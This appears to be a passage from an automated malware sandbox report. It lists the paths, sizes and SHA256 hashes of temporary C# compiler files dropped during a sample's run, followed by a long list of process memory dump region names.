                                                                                                            • Path \??\c:\Users\Admin\AppData\Local\Temp\3mj0eenm\CSCFF19331358D449A78D6C9E33697BC36A.TMP
                                                                                                            • Size 652B
                                                                                                            • SHA256 f4d73fdcc8468b2b287e3813122ac000d8645644db9cda5b634f3fa64b2b75a2
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            CSC39E6696EE82949AB8030A53B65CD2D9.TMP

                                                                                                            • Path \??\c:\Users\Admin\AppData\Local\Temp\dciirb3m\CSC39E6696EE82949AB8030A53B65CD2D9.TMP
                                                                                                            • Size 652B
                                                                                                            • SHA256 868e4a0a298fbc56cbf0ed3c3ca09fa28402af5f334e919e68335bebeeb54dfe
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            dciirb3m.0.cs

                                                                                                            • Path \??\c:\Users\Admin\AppData\Local\Temp\dciirb3m\dciirb3m.0.cs
                                                                                                            • Size 224B
                                                                                                            • SHA256 b59d0d5605f676222f00c1b940c6f01b69ee78d5b562094247cc681bad13b135
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            dciirb3m.cmdline

                                                                                                            • Path \??\c:\Users\Admin\AppData\Local\Temp\dciirb3m\dciirb3m.cmdline
                                                                                                            • Size 369B
                                                                                                            • SHA256 8cfc033ff55e976013f5199c8a23a0d17b201a9b8cb9beb384529c82d38ec895
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            memory/2636-3755-0x0000000003C70000-0x0000000004242000-memory.dmp

                                                                                                            memory/2636-3749-0x0000000003C70000-0x0000000004242000-memory.dmp

                                                                                                            memory/2636-3753-0x0000000003C70000-0x0000000004242000-memory.dmp

                                                                                                            memory/2636-3754-0x0000000003C70000-0x0000000004242000-memory.dmp

                                                                                                            memory/2636-3748-0x00000000017D0000-0x00000000017D3000-memory.dmp

                                                                                                            memory/3336-56-0x0000000005010000-0x000000000565A000-memory.dmp

                                                                                                            memory/3336-65-0x0000000007640000-0x0000000007CBC000-memory.dmp

                                                                                                            memory/3336-64-0x0000000005D40000-0x0000000005D8C000-memory.dmp

                                                                                                            memory/3336-63-0x0000000005D00000-0x0000000005D1E000-memory.dmp

                                                                                                            memory/3336-62-0x0000000005960000-0x0000000005CBB000-memory.dmp

                                                                                                            memory/3336-59-0x0000000005740000-0x00000000057A6000-memory.dmp

                                                                                                            memory/3336-66-0x0000000006230000-0x000000000624A000-memory.dmp

                                                                                                            memory/3336-58-0x0000000005660000-0x00000000056C6000-memory.dmp

                                                                                                            memory/3336-68-0x0000000007CC0000-0x0000000007E82000-memory.dmp

                                                                                                            memory/3336-55-0x0000000002490000-0x00000000024C6000-memory.dmp

                                                                                                            memory/3336-72-0x0000000007480000-0x00000000074A2000-memory.dmp

                                                                                                            memory/3336-57-0x0000000004F30000-0x0000000004F52000-memory.dmp

                                                                                                            memory/3336-71-0x00000000074F0000-0x0000000007586000-memory.dmp

                                                                                                            memory/3336-73-0x000000000B450000-0x000000000BA0A000-memory.dmp

                                                                                                            memory/5012-53-0x0000028036FD0000-0x0000028036FD6000-memory.dmp

                                                                                                            memory/5012-0-0x00007FFE6AA5F000-0x00007FFE6AA60000-memory.dmp

                                                                                                            memory/5012-30-0x0000028036E40000-0x0000028036E48000-memory.dmp

                                                                                                            memory/5012-20-0x00007FFE6A8D0000-0x00007FFE6B274000-memory.dmp

                                                                                                            memory/5012-19-0x00007FFE6A8D0000-0x00007FFE6B274000-memory.dmp

                                                                                                            memory/5012-14-0x00007FFE6A8D0000-0x00007FFE6B274000-memory.dmp

                                                                                                            memory/5012-13-0x00007FFE6A8D0000-0x00007FFE6B274000-memory.dmp

                                                                                                            memory/5012-12-0x00007FFE6A8D0000-0x00007FFE6B274000-memory.dmp

                                                                                                            memory/5012-11-0x00007FFE6A8D0000-0x00007FFE6B274000-memory.dmp

                                                                                                            memory/5012-10-0x00007FFE6A8D0000-0x00007FFE6B274000-memory.dmp

                                                                                                            memory/5012-9-0x00007FFE6A8D0000-0x00007FFE6B274000-memory.dmp

                                                                                                            memory/5012-8-0x00007FFE6A8D0000-0x00007FFE6B274000-memory.dmp

                                                                                                            memory/5012-7-0x00007FFE6A8D0000-0x00007FFE6B274000-memory.dmp

                                                                                                            memory/5012-6-0x00007FFE6A8D0000-0x00007FFE6B274000-memory.dmp

                                                                                                            memory/5012-43-0x0000028036E60000-0x0000028036E68000-memory.dmp

                                                                                                            memory/5012-46-0x0000028036EA0000-0x0000028036EBE000-memory.dmp

                                                                                                            memory/5012-47-0x0000028036EC0000-0x0000028036F72000-memory.dmp

                                                                                                            memory/5012-5-0x00007FFE6A8D0000-0x00007FFE6B274000-memory.dmp

                                                                                                            memory/5012-48-0x0000028036F80000-0x0000028036F8A000-memory.dmp

                                                                                                            memory/5012-49-0x0000028036FB0000-0x0000028036FCE000-memory.dmp

                                                                                                            memory/5012-50-0x0000028036F90000-0x0000028036F9A000-memory.dmp

                                                                                                            memory/5012-51-0x0000028036FF0000-0x000002803700C000-memory.dmp

                                                                                                            memory/5012-69-0x00007FFE6A8D0000-0x00007FFE6B274000-memory.dmp

                                                                                                            memory/5012-52-0x0000028036FA0000-0x0000028036FA8000-memory.dmp

                                                                                                            memory/5012-54-0x0000028036FE0000-0x0000028036FEA000-memory.dmp

                                                                                                            memory/5012-70-0x00007FFE6A8D0000-0x00007FFE6B274000-memory.dmp

                                                                                                            memory/5012-77-0x00007FFE6A8D0000-0x00007FFE6B274000-memory.dmp

                                                                                                            memory/5012-21-0x00007FFE6A8D0000-0x00007FFE6B274000-memory.dmp

                                                                                                            memory/5012-3-0x00007FFE6A8D0000-0x00007FFE6B274000-memory.dmp

                                                                                                            memory/5012-4-0x0000028036DD0000-0x0000028036DF2000-memory.dmp

                                                                                                            memory/5136-2496-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-2627-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-114-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-82-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-162-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-161-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-75-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-580-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-2497-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-2499-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-2501-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-2503-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-2502-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-2505-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-2507-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-2511-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-2513-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-2517-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-2526-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-2564-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-2571-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-2598-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-2613-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-119-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-2710-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-2796-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-2896-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-76-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-581-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-74-0x0000000000EE0000-0x0000000000F1F000-memory.dmp

                                                                                                            memory/5136-582-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-964-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-3757-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-3759-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-3762-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-3756-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-3765-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-3767-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-3768-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-4476-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-4480-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-4483-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-4485-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-4482-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-4481-0x0000000002C30000-0x0000000002CF0000-memory.dmp

                                                                                                            memory/5136-4492-0x0000000002C30000-0x0000000002CF0000-memory.dmp